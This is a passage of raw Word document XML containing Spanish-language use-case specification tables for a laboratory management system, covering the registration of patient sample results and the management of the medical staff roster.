                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Permite </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">registrar y modificar los resultados obtenidos del análisis de la(s) muestra(s) del </w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>aciente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Bioquímico </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="193"/>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Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Bioquímico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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CU8. Gestionar Análisis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="260"/>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Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="002F334D" w:rsidRDefault="00491F38" w:rsidP="0074429D">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F334D">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Registrar</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="008E1A31" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir código del paciente.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Generar datos del paciente.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir código de muestra.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="0007211F" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Generar datos de la muestra</w:t>
            </w:r>
            <w:r w:rsidRPr="0007211F">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ntroducir nombre del médico</w:t>
            </w:r>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ingresar fecha de registro.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Validar datos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="0007211F" w:rsidRDefault="00491F38" w:rsidP="00E27657">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E1A31">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Guardar datos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">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b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Buscar </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Introducir código del paciente.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="0007211F" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Generar resultados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Postcondición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00D12100"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12100">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> No existe el paciente con los datos introducidos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.3. No existe la muestra con los datos introducidos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.1. No existe el paciente con los datos introducidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc454371311"/>
      <w:r>
        <w:t>Gestionar plantel médico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="00E27657">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003900FF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09FE8848" wp14:editId="04BEE9D5">
            <wp:extent cx="4676775" cy="2693004"/>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4996" cy="2697738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula4-nfasis1"/>
        <w:tblW w:w="9063" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2693"/>
        <w:gridCol w:w="6370"/>
      </w:tblGrid>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CU5</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gestionar plantel médico</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Gestionar los médicos que cuenta el laboratorio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:spacing w:line="120" w:lineRule="exact"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permite a los usuarios correspondientes poder realizar algunas acciones sobre el plantel medico como ser : Buscar , Dar de baja, Agregar , Actualizar, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">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Actores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Administrador del sistema, Médico, Bioquímico, Auxiliar de laboratorio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="253"/>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Actor Iniciador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Pr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Administrador del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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Precondición</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="001819E1"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Ninguno.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="1899"/>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p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Proceso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00BD6F1D" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Buscar plantel medico</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00BD6F1D" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD6F1D">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Llenar los campos requeridos del médico.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00BD6F1D" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD6F1D">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Buscar</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD6F1D">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dar de baja al médico.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="792"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">2.1 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Buscar médico</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="00E27657">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="792"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">2.2 </w:t>
            </w:r>
            <w:r w:rsidRPr="007D1A34">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dar de baja.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38"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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pos</w:t>
            </w:r>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>condición</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF"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Ninguno.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00491F38" w:rsidTr="007E1287">
        <w:trPr>
          <w:trHeight w:val="1760"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00C05BAF" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C05BAF">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Excepciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00491F38" w:rsidRPr="00B03636" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:left="405"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B03636">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Si el médico no se encuentra, se procederá a mostrar nada.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRDefault="00491F38" w:rsidP="0074429D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:left="405"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Si el médico no se encuentra no se podrá realizar la baja.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00491F38" w:rsidRPr="00E81C7F"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Pr>
